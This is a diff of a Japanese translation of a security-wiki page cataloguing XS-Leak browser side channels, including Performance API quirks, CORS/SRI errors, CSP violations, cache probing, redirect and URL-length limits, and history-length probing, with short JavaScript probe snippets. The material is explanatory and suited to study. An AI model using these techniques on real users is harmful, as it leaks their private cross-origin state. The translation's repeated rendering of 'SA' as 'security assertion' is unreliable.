 - **Code Example**: [https://xsinator.com/testing.html#Style%20Reload%20Error%20Leak](https://xsinator.com/testing.html#Style%20Reload%20Error%20Leak)
 
-前の技術では、GCのブラウザバグにより、**リソースが読み込まれないときに2回読み込まれる**2つのケースが特定されました。これにより、Performance APIに複数のエントリが生成され、検出可能になります。
+前の技術では、GCのブラウザバグにより、**リソースが読み込まれないときに2回読み込まれる** 2つのケースが特定されました。これにより、Performance APIに複数のエントリが生成され、検出可能になります。
 
 ### Request Merging Error
 
@@ -310,7 +310,7 @@ HTTP応答ステータスコードを**区別**することが可能です。な
 - **Summary:** エラーを引き起こすリクエストはマージできません。
 - **Code Example**: [https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak)
 
-この技術は、前述の論文の表に見つかりましたが、技術の説明は見つかりませんでした。ただし、[https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak)でソースコードを確認することができます。
+この技術は、前述の論文の表に見つかりましたが、技術の説明は見つかりませんでした。ただし、[https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak) でソースコードを確認することができます。
 
 ### Empty Page Leak
 
@@ -320,17 +320,17 @@ HTTP応答ステータスコードを**区別**することが可能です。な
 - **Summary:** 空の応答はリソースタイミングエントリを作成しません。
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20Empty%20Page%20Leak](https://xsinator.com/testing.html#Performance%20API%20Empty%20Page%20Leak)
 
-攻撃者は、リクエストが空のHTTP応答ボディをもたらしたかどうかを検出できます。なぜなら、**空のページは一部のブラウザでパフォーマンスエントリを作成しない**からです。
+攻撃者は、リクエストが空のHTTP応答ボディをもたらしたかどうかを検出できます。なぜなら、**空のページは一部のブラウザでパフォーマンスエントリを作成しない** からです。
 
 ### **XSS-Auditor Leak**
 
 - **Inclusion Methods**: Frames
 - **Detectable Difference**: ページコンテンツ
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** セキュリティアサーションでXSS Auditorを使用することで、攻撃者は特定のウェブページ要素を検出できます。これは、作成されたペイロードが監査人のフィルタリングメカニズムをトリガーしたときの応答の変化を観察することによって行われます。
+- **Summary:** セキュリティアサーションでXSS Auditorを使用することで、攻撃者は特定のウェブページ要素を、作成したペイロードが監査人のフィルタリングメカニズムをトリガーしたときの応答の変化を観察することによって検出できます。
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak](https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak)
 
-セキュリティアサーション（SA）において、元々クロスサイトスクリプティング（XSS）攻撃を防ぐために設計されたXSS Auditorは、逆説的に機密情報を漏洩させるために悪用される可能性があります。この組み込み機能はGoogle Chrome（GC）から削除されましたが、SAにはまだ存在します。2013年、BraunとHeiderichは、XSS Auditorが正当なスクリプトを誤ってブロックし、偽陽性を引き起こす可能性があることを示しました。これに基づいて、研究者たちは情報を抽出し、クロスオリジンページ上の特定のコンテンツを検出する技術を開発しました。この概念はXS-Leaksとして知られ、最初にTeradaによって報告され、Heyesによってブログ投稿で詳述されました。これらの技術はGCのXSS Auditorに特有でしたが、SAではXSS AuditorによってブロックされたページはPerformance APIにエントリを生成しないことが発見され、機密情報が漏洩する可能性がある方法が明らかになりました。
+セキュリティアサーション（SA）では、元々クロスサイトスクリプティング（XSS）攻撃を防ぐために設計されたXSS Auditorが、逆説的に機密情報を漏洩させるために悪用される可能性があります。この組み込み機能はGoogle Chrome（GC）から削除されましたが、SAにはまだ存在します。2013年、BraunとHeiderichは、XSS Auditorが正当なスクリプトを誤ってブロックし、偽陽性を引き起こす可能性があることを示しました。これを基に、研究者たちは情報を抽出し、クロスオリジンページ上の特定のコンテンツを検出する技術を開発しました。この概念はXS-Leaksとして知られ、最初にTeradaによって報告され、Heyesによってブログ投稿で詳述されました。これらの技術はGCのXSS Auditorに特有でしたが、SAではXSS AuditorによってブロックされたページはPerformance APIにエントリを生成しないことが発見され、機密情報が漏洩する可能性がある方法が明らかになりました。
 
 ### X-Frame Leak
 
@@ -340,8 +340,8 @@ HTTP応答ステータスコードを**区別**することが可能です。な
 - **Summary:** X-Frame-Optionsヘッダーを持つリソースはリソースタイミングエントリを作成しません。
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak](https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak)
 
-ページが**iframe内でのレンダリングを許可されていない**場合、**パフォーマンスエントリを作成しません**。その結果、攻撃者は応答ヘッダー**`X-Frame-Options`**を検出できます。\
-同様のことが**embed**タグを使用した場合にも起こります。
+ページが **iframe内でのレンダリングを許可されていない** 場合、**パフォーマンスエントリを作成しません**。その結果、攻撃者は応答ヘッダー **`X-Frame-Options`** を検出できます。\
+**embed** **タグ** を使用した場合も同様です。
 
 ### Download Detection
 
@@ -351,7 +351,7 @@ HTTP応答ステータスコードを**区別**することが可能です。な
 - **Summary:** ダウンロードはPerformance APIにリソースタイミングエントリを作成しません。
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20Download%20Detection](https://xsinator.com/testing.html#Performance%20API%20Download%20Detection)
 
-前述のXS-Leakと同様に、**ContentDispositionヘッダーのためにダウンロードされるリソース**も**パフォーマンスエントリを作成しません**。この技術はすべての主要なブラウザで機能します。
+前述のXS-Leakと同様に、**ContentDispositionヘッダー** によってダウンロードされる **リソース** も **パフォーマンスエントリを作成しません**。この技術はすべての主要なブラウザで機能します。
 
 ### Redirect Start Leak
 
@@ -361,17 +361,17 @@ HTTP応答ステータスコードを**区別**することが可能です。な
 - **Summary:** リソースタイミングエントリはリダイレクトの開始時間を漏洩します。
 - **Code Example**: [https://xsinator.com/testing.html#Redirect%20Start%20Leak](https://xsinator.com/testing.html#Redirect%20Start%20Leak)
 
-クロスオリジンリクエストに関する過剰な情報を記録する一部のブラウザの動作を悪用するXS-Leakのインスタンスが見つかりました。標準では、クロスオリジンリソースに対してゼロに設定すべき属性のサブセットが定義されています。しかし、**SA**では、ターゲットページによってユーザーが**リダイレクト**されたかどうかを、**Performance API**を照会し、**redirectStartタイミングデータ**を確認することで検出できます。
+いくつかのブラウザの動作を悪用するXS-Leakのインスタンスが見つかりました。これらのブラウザはクロスオリジンリクエストに対して過剰な情報を記録します。標準では、クロスオリジンリソースに対してゼロに設定すべき属性のサブセットが定義されています。しかし、**SA** では、ターゲットページによってユーザーが **リダイレクト** されたかどうかを、**Performance API** を照会し、**redirectStartタイミングデータ** を確認することで検出できます。
 
 ### Duration Redirect Leak
 
 - **Inclusion Methods**: Fetch API
 - **Detectable Difference**: リダイレクト
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** リダイレクトが発生した場合、タイミングエントリの持続時間は負の値になります。
+- **Summary:** リダイレクトが発生した場合、タイミングエントリの持続時間は負になります。
 - **Code Example**: [https://xsinator.com/testing.html#Duration%20Redirect%20Leak](https://xsinator.com/testing.html#Duration%20Redirect%20Leak)
 
-GCでは、**リダイレクト**を引き起こすリクエストの**持続時間**は**負の値**になり、リダイレクトが発生しないリクエストと**区別**できます。
+GCでは、**リダイレクト** を引き起こすリクエストの **持続時間** は **負** であり、したがって **リダイレクトを引き起こさないリクエスト** とは **区別** できます。
 
 ### CORP Leak
 
@@ -381,7 +381,7 @@ GCでは、**リダイレクト**を引き起こすリクエストの**持続時
 - **Summary:** CORPで保護されたリソースはリソースタイミングエントリを作成しません。
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak](https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak)
 
-場合によっては、**nextHopProtocolエントリ**を漏洩技術として使用できます。GCでは、**CORPヘッダー**が設定されていると、nextHopProtocolは**空**になります。CORPが有効なリソースに対しては、SAはパフォーマンスエントリをまったく作成しません。
+場合によっては、**nextHopProtocolエントリ** を漏洩技術として使用できます。GCでは、**CORPヘッダー** が設定されていると、nextHopProtocolは **空** になります。CORP対応リソースに対しては、SAはパフォーマンスエントリをまったく作成しません。
 
 ### Service Worker
 
@@ -391,9 +391,9 @@ GCでは、**リダイレクト**を引き起こすリクエストの**持続時
 - **Summary:** 特定のオリジンに対してサービスワーカーが登録されているかどうかを検出します。
 - **Code Example**:
 
-サービスワーカーは、オリジンで実行されるイベント駆動型スクリプトコンテキストです。これらはウェブページのバックグラウンドで実行され、リソースをインターセプト、変更、および**キャッシュ**してオフラインウェブアプリケーションを作成できます。\
-**サービスワーカー**によって**キャッシュされたリソース**が**iframe**を介してアクセスされると、そのリソースは**サービスワーカーキャッシュから読み込まれます**。\
-リソースが**サービスワーカー**キャッシュから**読み込まれたかどうかを検出するために、**Performance API**を使用できます。\
+サービスワーカーは、オリジンで実行されるイベント駆動型スクリプトコンテキストです。これらはウェブページのバックグラウンドで実行され、リソースをインターセプト、変更、および **キャッシュ** してオフラインウェブアプリケーションを作成できます。\
+**サービスワーカー** によって **キャッシュされたリソース** が **iframe** を介してアクセスされると、そのリソースは **サービスワーカーキャッシュから読み込まれます**。\
+リソースが **サービスワーカー** キャッシュから **読み込まれたかどうかを検出するために、Performance API** を使用できます。\
 これもタイミング攻撃で行うことができます（詳細については論文を参照してください）。
 
 ### Cache
@@ -404,7 +404,7 @@ GCでは、**リダイレクト**を引き起こすリクエストの**持続時
 - **Summary:** リソースがキャッシュに保存されているかどうかを確認できます。
 - **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources), [https://xsinator.com/testing.html#Cache%20Leak%20(POST)](<https://xsinator.com/testing.html#Cache%20Leak%20(POST)>)
 
-[Performance API](./#performance-api)を使用して、リソースがキャッシュされているかどうかを確認できます。
+[Performance API](./#performance-api) を使用して、リソースがキャッシュされているかどうかを確認できます。
 
 ### Network Duration
 
@@ -470,7 +470,7 @@ err.message +
 audioElement.onerror = errHandler
 }
 ```
-`MediaError`インターフェースのメッセージプロパティは、成功裏に読み込まれたリソースを一意に識別する特異な文字列です。攻撃者はこの機能を利用して、メッセージの内容を観察することで、クロスオリジンリソースの応答ステータスを推測できます。
+`MediaError`インターフェースのメッセージプロパティは、成功裏に読み込まれたリソースを一意に識別する特定の文字列を持っています。攻撃者はこの機能を利用して、メッセージの内容を観察することで、クロスオリジンリソースの応答ステータスを推測できます。
 
 ### CORSエラー
 
@@ -490,17 +490,17 @@ audioElement.onerror = errHandler
 - **概要:** セキュリティアサーション（SA）において、CORSエラーメッセージは意図せずリダイレクトされたリクエストの完全なURLを露出します。
 - **コード例**: [https://xsinator.com/testing.html#SRI%20Error%20Leak](https://xsinator.com/testing.html#SRI%20Error%20Leak)
 
-攻撃者は**冗長なエラーメッセージ**を利用して、クロスオリジンレスポンスのサイズを推測することができます。これは、サブリソース整合性（SRI）のメカニズムによるもので、整合性属性を使用して、CDNから取得されたリソースが改ざんされていないことを検証します。SRIがクロスオリジンリソースで機能するためには、これらが**CORS対応**である必要があります。さもなければ、整合性チェックの対象にはなりません。セキュリティアサーション（SA）において、CORSエラーXSリークと同様に、整合性属性を持つフェッチリクエストが失敗した後にエラーメッセージをキャプチャできます。攻撃者は、任意のリクエストの整合性属性に**偽のハッシュ値**を割り当てることで、このエラーを意図的に**トリガー**できます。SAでは、結果として得られるエラーメッセージが要求されたリソースのコンテンツ長を意図せず明らかにします。この情報漏洩により、攻撃者は応答サイズの変動を識別でき、洗練されたXSリーク攻撃への道を開きます。
+攻撃者は**冗長なエラーメッセージ**を利用して、クロスオリジンレスポンスのサイズを推測することができます。これは、サブリソース整合性（SRI）のメカニズムによるもので、整合性属性を使用して、CDNから取得されたリソースが改ざんされていないことを検証します。SRIがクロスオリジンリソースで機能するためには、これらが**CORS対応**である必要があります。さもなければ、整合性チェックの対象にはなりません。セキュリティアサーション（SA）において、CORSエラーXS-Leakと同様に、整合性属性を持つフェッチリクエストが失敗した後にエラーメッセージをキャプチャできます。攻撃者は、任意のリクエストの整合性属性に**偽のハッシュ値**を割り当てることで、このエラーを意図的に**トリガー**できます。SAでは、結果として得られるエラーメッセージが要求されたリソースのコンテンツ長を意図せず明らかにします。この情報漏洩により、攻撃者は応答サイズの変動を識別でき、洗練されたXS-Leak攻撃への道を開きます。
 
 ### CSP違反/検出
 
 - **インクルージョンメソッド**: ポップアップ
 - **検出可能な違い**: ステータスコード
 - **詳細情報**: [https://bugs.chromium.org/p/chromium/issues/detail?id=313737](https://bugs.chromium.org/p/chromium/issues/detail?id=313737), [https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html](https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html), [https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects](https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects)
-- **概要:** CSPで被害者のウェブサイトのみを許可すると、異なるドメインにリダイレクトしようとした場合、CSPは検出可能なエラーをトリガーします。
+- **概要:** CSPで被害者のウェブサイトのみを許可すると、異なるドメインにリダイレクトしようとするとCSPが検出可能なエラーをトリガーします。
 - **コード例**: [https://xsinator.com/testing.html#CSP%20Violation%20Leak](https://xsinator.com/testing.html#CSP%20Violation%20Leak), [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation)
 
-XSリークは、CSPを使用してクロスオリジンサイトが異なるオリジンにリダイレクトされたかどうかを検出できます。このリークはリダイレクトを検出できますが、さらにリダイレクトターゲットのドメインも漏洩します。この攻撃の基本的なアイデアは、**攻撃者サイトでターゲットドメインを許可する**ことです。ターゲットドメインにリクエストが発行されると、**リダイレクト**がクロスオリジンドメインに行われます。**CSPは**それへのアクセスをブロックし、**違反レポートを作成してリーク技術として使用します**。ブラウザによっては、**このレポートがリダイレクトのターゲット位置を漏洩する可能性があります**。\
+XS-LeakはCSPを使用して、クロスオリジンサイトが異なるオリジンにリダイレクトされたかどうかを検出できます。この漏洩はリダイレクトを検出できますが、さらにリダイレクトターゲットのドメインも漏洩します。この攻撃の基本的なアイデアは、**攻撃者サイトでターゲットドメインを許可する**ことです。ターゲットドメインにリクエストが発行されると、**リダイレクト**がクロスオリジンドメインに行われます。**CSPは**それへのアクセスをブロックし、**違反レポートを作成して漏洩技術として使用します**。ブラウザによっては、**このレポートがリダイレクトのターゲット位置を漏洩する可能性があります**。\
 最新のブラウザは、リダイレクト先のURLを示しませんが、クロスオリジンリダイレクトがトリガーされたことを検出することはできます。
 
 ### キャッシュ
@@ -511,19 +511,19 @@ XSリークは、CSPを使用してクロスオリジンサイトが異なるオ
 - **概要:** ファイルをキャッシュからクリアします。ターゲットページを開き、ファイルがキャッシュに存在するかどうかを確認します。
 - **コード例:**
 
-ブラウザは、すべてのウェブサイトに対して1つの共有キャッシュを使用する場合があります。オリジンに関係なく、ターゲットページが**特定のファイルを要求したかどうかを推測することが可能です**。
+ブラウザはすべてのウェブサイトに対して1つの共有キャッシュを使用する場合があります。オリジンに関係なく、ターゲットページが**特定のファイルを要求したかどうかを推測することが可能です**。
 
-ページがユーザーがログインしている場合にのみ画像を読み込む場合、**リソースを無効にする**（キャッシュされていない場合は、詳細情報リンクを参照）ことができ、**そのリソースを読み込むリクエストを実行し、**（例：過剰なリファラーヘッダーを使用して）**不正なリクエストでリソースを読み込もうとします**。リソースの読み込みが**エラーをトリガーしなかった場合**、それは**キャッシュされていた**からです。
+ページがユーザーがログインしている場合にのみ画像を読み込む場合、**リソースを無効にする**（キャッシュされていない場合は、詳細情報リンクを参照）ことができ、**そのリソースを読み込むリクエストを実行し、**不正なリクエスト**（例：過剰なリファラーヘッダーを使用）でリソースを読み込もうとします。リソースの読み込みが**エラーをトリガーしなかった**場合、それは**キャッシュされていた**からです。
 
 ### CSPディレクティブ
 
 - **インクルージョンメソッド**: フレーム
 - **検出可能な違い**: ヘッダー
 - **詳細情報**: [https://bugs.chromium.org/p/chromium/issues/detail?id=1105875](https://bugs.chromium.org/p/chromium/issues/detail?id=1105875)
-- **概要:** CSPヘッダーディレクティブは、CSP iframe属性を使用してプローブでき、ポリシーの詳細を明らかにします。
+- **概要:** CSPヘッダーディレクティブは、CSP iframe属性を使用して調査でき、ポリシーの詳細を明らかにします。
 - **コード例**: [https://xsinator.com/testing.html#CSP%20Directive%20Leak](https://xsinator.com/testing.html#CSP%20Directive%20Leak)
 
-Google Chrome（GC）の新機能により、ウェブページはiframe要素に属性を設定することで**コンテンツセキュリティポリシー（CSP）を提案**でき、ポリシーディレクティブがHTTPリクエストと共に送信されます。通常、埋め込まれたコンテンツは**これをHTTPヘッダーを介して承認する必要があります**。さもなければ、**エラーページが表示されます**。ただし、iframeがすでにCSPによって管理されており、新たに提案されたポリシーがより制限的でない場合、ページは通常通り読み込まれます。このメカニズムは、攻撃者がクロスオリジンページの**特定のCSPディレクティブを検出する**ための道を開きます。エラーページを特定することができる新しいリーク技術が発見され、根本的な問題が完全には解決されていないことを示唆しています。
+Google Chrome（GC）の新機能により、ウェブページはiframe要素に属性を設定することで**コンテンツセキュリティポリシー（CSP）を提案**でき、ポリシーディレクティブがHTTPリクエストと共に送信されます。通常、埋め込まれたコンテンツは**これをHTTPヘッダーを介して承認する必要があります**。さもなければ、**エラーページが表示されます**。ただし、iframeがすでにCSPによって管理されており、新たに提案されたポリシーがより制限的でない場合、ページは通常通り読み込まれます。このメカニズムは、攻撃者がクロスオリジンページの**特定のCSPディレクティブを検出する**ための道を開きます。エラーページを特定する新しい漏洩技術が発見されたことを示唆しています。
 
 ### **CORP**
 
@@ -533,14 +533,14 @@ Google Chrome（GC）の新機能により、ウェブページはiframe要素
 - **概要:** クロスオリジンリソースポリシー（CORP）で保護されたリソースは、許可されていないオリジンから取得されるとエラーを発生させます。
 - **コード例**: [https://xsinator.com/testing.html#CORP%20Leak](https://xsinator.com/testing.html#CORP%20Leak)
 
-CORPヘッダーは比較的新しいウェブプラットフォームのセキュリティ機能で、設定されると**指定されたリソースへのノーコルスクロスオリジンリクエストをブロックします**。ヘッダーの存在は検出可能で、CORPで保護されたリソースは**取得されるとエラーを発生させます**。
+CORPヘッダーは比較的新しいウェブプラットフォームのセキュリティ機能で、設定されると**指定されたリソースへのno-corsクロスオリジンリクエストをブロックします**。ヘッダーの存在は検出可能で、CORPで保護されたリソースは**取得されるとエラーを発生させます**。
 
 ### CORB
 
 - **インクルージョンメソッド**: HTML要素
 - **検出可能な違い**: ヘッダー
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header](https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header)
-- **概要**: CORBは、リクエストに**`nosniff`ヘッダーが存在するかどうかを攻撃者が検出できる**ようにします。
+- **概要**: CORBは攻撃者が**リクエストに`nosniff`ヘッダーが存在するかどうかを検出する**ことを可能にします。
 - **コード例**: [https://xsinator.com/testing.html#CORB%20Leak](https://xsinator.com/testing.html#CORB%20Leak)
 
 攻撃についての詳細情報はリンクを確認してください。
@@ -553,7 +553,7 @@ CORPヘッダーは比較的新しいウェブプラットフォームのセキ
 - **概要**: Originヘッダーが`Access-Control-Allow-Origin`ヘッダーに反映されている場合、リソースがすでにキャッシュに存在するかどうかを確認できます。
 - **コード例**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
 
-**Originヘッダー**が`Access-Control-Allow-Origin`ヘッダーに**反映されている**場合、攻撃者はこの動作を悪用して**CORSモードでリソースを取得しようとする**ことができます。**エラー**が**トリガーされない**場合、それは**ウェブから正しく取得された**ことを意味し、エラーが**トリガーされる**場合、それは**キャッシュからアクセスされた**ことを意味します（エラーは、キャッシュが元のドメインを許可するCORSヘッダーを持つ応答を保存しているために発生します）。\
+**Originヘッダー**が`Access-Control-Allow-Origin`ヘッダーに**反映**されている場合、攻撃者はこの動作を悪用して**CORSモードでリソースを取得**しようとすることができます。**エラー**が**トリガーされない**場合、それは**ウェブから正しく取得された**ことを意味し、エラーが**トリガーされる**場合、それは**キャッシュからアクセスされた**ことを意味します（エラーは、キャッシュが元のドメインを許可するCORSヘッダーを持つ応答を保存しているために発生します）。\
 オリジンが反映されていないがワイルドカードが使用されている場合（`Access-Control-Allow-Origin: *`）、これは機能しません。
 
 ## 読み取り可能な属性技術
@@ -576,19 +576,18 @@ CORPヘッダーは比較的新しいウェブプラットフォームのセキ
 - **概要:** クロスオリジンオープナーポリシー（COOP）で保護されたページは、クロスオリジンの相互作用からのアクセスを防ぎます。
 - **コード例**: [https://xsinator.com/testing.html#COOP%20Leak](https://xsinator.com/testing.html#COOP%20Leak)
 
-攻撃者は、クロスオリジンHTTP応答におけるクロスオリジンオープナーポリシー（COOP）ヘッダーの存在を推測することができます。COOPは、外部サイトが任意のウィンドウ参照を取得するのを妨げるためにウェブアプリケーションによって使用されます。このヘッダーの可視性は、**`contentWindow`参照にアクセスしようとすることで判断できます**。COOPが条件付きで適用されるシナリオでは、**`opener`プロパティ**が明白な指標となります：COOPが有効な場合は**未定義**であり、無効な場合は**定義されます**。
+攻撃者は、クロスオリジンHTTP応答におけるクロスオリジンオープナーポリシー（COOP）ヘッダーの存在を推測することができます。COOPは、外部サイトが任意のウィンドウ参照を取得するのを妨げるためにウェブアプリケーションによって使用されます。このヘッダーの可視性は、**`contentWindow`参照にアクセスしようとすることで判断できます**。COOPが条件付きで適用されるシナリオでは、**`opener`プロパティ**が明白な指標となります：COOPが有効な場合は**未定義**であり、無効な場合は**定義されています**。
 
 ### URL最大長 - サーバーサイド
 
 - **インクルージョンメソッド**: Fetch API、HTML要素
 - **検出可能な違い**: ステータスコード / コンテンツ
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects](https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects)
-- **概要:** リダイレクト応答の長さの違いを検出します。サーバーがエラーで再生するほど長すぎる場合があります。
+- **概要:** リダイレクト応答の長さの違いを検出します。サーバーがエラーで再生する可能性があるため、長すぎる場合があります。
 - **コード例**: [https://xsinator.com/testing.html#URL%20Max%20Length%20Leak](https://xsinator.com/testing.html#URL%20Max%20Length%20Leak)
 
-サーバーサイドリダイレクトが**リダイレクト内でユーザー入力を使用し**、**追加データ**を持つ場合、この動作を検出することが可能です。通常、**サーバー**には**リクエスト長の制限**があります。もし**ユーザーデータ**がその**長さ - 1**であれば、**リダイレクト**が**そのデータを使用し**、**何かを追加**しているため、**エラーがトリガーされ、エラーイベントを介して検出可能です**。
-
-もし何らかの方法でユーザーにクッキーを設定できる場合、**十分なクッキーを設定することによって**この攻撃を実行することもできます（[**クッキーボム**](../hacking-with-cookies/cookie-bomb.md)）。その結果、**正しい応答のサイズが増加し**、**エラーがトリガーされます**。この場合、同じサイトからこのリクエストをトリガーすると、`<script>`が自動的にクッキーを送信するため（エラーを確認できます）。\
+サーバーサイドリダイレクトが**リダイレクト内でユーザー入力を使用し**、**追加データ**を持つ場合、この動作を検出することが可能です。通常、**サーバー**には**リクエスト長の制限**があります。もし**ユーザーデータ**がその**長さ - 1**であれば、**リダイレクト**が**そのデータ**を使用し、**何か追加**しているため、**エラーがトリガーされます**（エラーは、リダイレクトがそのデータを使用しているために発生します）。\
+ユーザーにクッキーを設定できる場合、**十分なクッキーを設定することによって**この攻撃を実行することもできます（[**クッキーボム**](../hacking-with-cookies/cookie-bomb.md)）。その結果、**正しい応答のサイズが増加**し、**エラー**がトリガーされます。この場合、同じサイトからこのリクエストをトリガーすると、`<script>`が自動的にクッキーを送信するため（エラーを確認できます）。\
 **クッキーボム + XS-Search**の例は、この書き込みの意図された解決策に見つけることができます: [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended)
 
 `SameSite=None`または同じコンテキストにいることが、この種の攻撃には通常必要です。
@@ -603,11 +602,11 @@ CORPヘッダーは比較的新しいウェブプラットフォームのセキ
 
 [Chromiumのドキュメント](https://chromium.googlesource.com/chromium/src/+/main/docs/security/url_display_guidelines/url_display_guidelines.md#URL-Length)によると、Chromeの最大URL長は2MBです。
 
-> 一般的に、_ウェブプラットフォーム_にはURLの長さに制限はありません（ただし、2^31は一般的な制限です）。_Chrome_は、実用的な理由とプロセス間通信でのサービス拒否問題を回避するために、URLを最大**2MB**に制限しています。
+> 一般的に、_ウェブプラットフォーム_にはURLの長さに制限はありません（ただし、2^31は一般的な制限です）。_Chrome_は、実用的な理由とプロセス間通信におけるサービス拒否問題を回避するために、URLを最大**2MB**に制限しています。
 
-したがって、**リダイレクトURLの応答が一方のケースで大きい場合**、**2MBより大きいURLでリダイレクトさせる**ことが可能です。これが発生すると、Chromeは**`about:blank#blocked`**ページを表示します。
+したがって、**リダイレクトURLの応答が一方のケースで大きい場合**、**2MBより大きいURLでリダイレクト**させることが可能です。これが発生すると、Chromeは**`about:blank#blocked`**ページを表示します。
 
-**顕著な違い**は、**リダイレクト**が**完了した**場合、`window.origin`が**エラーをスロー**することです。クロスオリジンはその情報にアクセスできません。しかし、**制限**が\*\*\*\*に達し、読み込まれたページが**`about:blank#blocked`**である場合、ウィンドウの**`origin`**は**親**のものであり、これは**アクセス可能な情報**です。
+**顕著な違い**は、**リダイレクト**が**完了**した場合、`window.origin`が**エラー**をスローすることです。クロスオリジンはその情報にアクセスできません。しかし、**制限**が\*\*\*\*に達し、読み込まれたページが**`about:blank#blocked`**である場合、ウィンドウの**`origin`**は**親**のものであり、これは**アクセス可能な情報**です。
 
 **2MB**に達するために必要なすべての追加情報は、最初のURLに**ハッシュ**を追加することで追加でき、リダイレクトで**使用されます**。
 
@@ -623,7 +622,7 @@ url-max-length-client-side.md
 - **概要:** ブラウザのリダイレクト制限を使用して、URLリダイレクションの発生を確認します。
 - **コード例**: [https://xsinator.com/testing.html#Max%20Redirect%20Leak](https://xsinator.com/testing.html#Max%20Redirect%20Leak)
 
-ブラウザの**最大**リダイレクト数が**20**の場合、攻撃者は**19のリダイレクト**でページを読み込もうとし、最終的に**被害者を**テストされたページに**送信**します。**エラー**がトリガーされる場合、ページは**被害者をリダイレクトしようとしていた**ことになります。
+ブラウザの**最大**リダイレクト数が**20**の場合、攻撃者は**19回のリダイレクト**でページを読み込もうとし、最終的に**被害者**をテストされたページに送信することができます。**エラー**がトリガーされる場合、ページは**被害者をリダイレクトしようとしていた**ことになります。
 
 ### 履歴の長さ
 
@@ -643,7 +642,7 @@ url-max-length-client-side.md
 - **概要:** 履歴の長さを悪用して、フレーム/ポップアップの位置が特定のURLにあるかどうかを推測できます。
 - **コード例**: 以下
 
-攻撃者はJavaScriptコードを使用して、**フレーム/ポップアップの位置を推測したものに操作し**、**すぐに**それを**`about:blank`**に**変更**することができます。履歴の長さが増加した場合、それはURLが正しかったことを意味し、**同じであればURLは再読み込みされないため**、増加する時間がありました。増加しなかった場合、それは**推測したURLを読み込もうとした**が、**すぐに**`about:blank`を読み込んだため、**推測したURLを読み込む際に履歴の長さは増加しなかった**ことを意味します。
+攻撃者はJavaScriptコードを使用して、**フレーム/ポップアップの位置を推測したものに操作し**、**すぐに**それを`about:blank`に**変更**することができます。履歴の長さが増加した場合、それはURLが正しかったことを意味し、**同じであれば再読み込みされないため**増加する時間がありました。増加しなかった場合、それは**推測したURLを読み込もうとした**が、**すぐに**`about:blank`を読み込んだため、**履歴の長さは増加しなかった**ことを意味します。
 ```javascript
 async function debug(win, url) {
 win.location = url + "#aaa"
@@ -672,7 +671,7 @@ console.log(await debug(win, "https://example.com/?a=b"))
 `iframe` または `window.open` を介して開かれた **ウェブのフレームの数**をカウントすることで、**そのページ上のユーザーの状態**を特定するのに役立つかもしれません。\
 さらに、ページが常に同じ数のフレームを持っている場合、フレームの数を**継続的に**チェックすることで、情報が漏洩する可能性のある**パターン**を特定するのに役立つかもしれません。
 
-この技術の例として、Chrome では **PDF** が **フレームカウント** によって **検出** されることがあります。なぜなら、内部で `embed` が使用されているからです。`zoom`、`view`、`page`、`toolbar` などのコンテンツに対する制御を許可する [Open URL Parameters](https://bugs.chromium.org/p/chromium/issues/detail?id=64309#c113) があり、この技術が興味深い場合があります。
+この技術の例として、Chromeでは、**PDF**が**フレームカウント**で**検出**されることがあります。なぜなら、内部で `embed` が使用されているからです。`zoom`、`view`、`page`、`toolbar` などのコンテンツに対する制御を許可する [Open URL Parameters](https://bugs.chromium.org/p/chromium/issues/detail?id=64309#c113) があり、この技術が興味深い場合があります。
 
 ### HTMLElements
 
@@ -682,12 +681,12 @@ console.log(await debug(win, "https://example.com/?a=b"))
 - **概要:** 漏洩した値を読み取って、2つの可能な状態を区別します。
 - **コード例**: [https://xsleaks.dev/docs/attacks/element-leaks/](https://xsleaks.dev/docs/attacks/element-leaks/), [https://xsinator.com/testing.html#Media%20Dimensions%20Leak](https://xsinator.com/testing.html#Media%20Dimensions%20Leak), [https://xsinator.com/testing.html#Media%20Duration%20Leak](https://xsinator.com/testing.html#Media%20Duration%20Leak)
 
-HTML要素を通じた情報漏洩は、特にユーザー情報に基づいて動的メディアファイルが生成される場合や、メディアサイズを変更する透かしが追加される場合に、ウェブセキュリティにおいて懸念されます。攻撃者は、特定のHTML要素によって露出された情報を分析することで、可能な状態を区別するためにこれを悪用することができます。
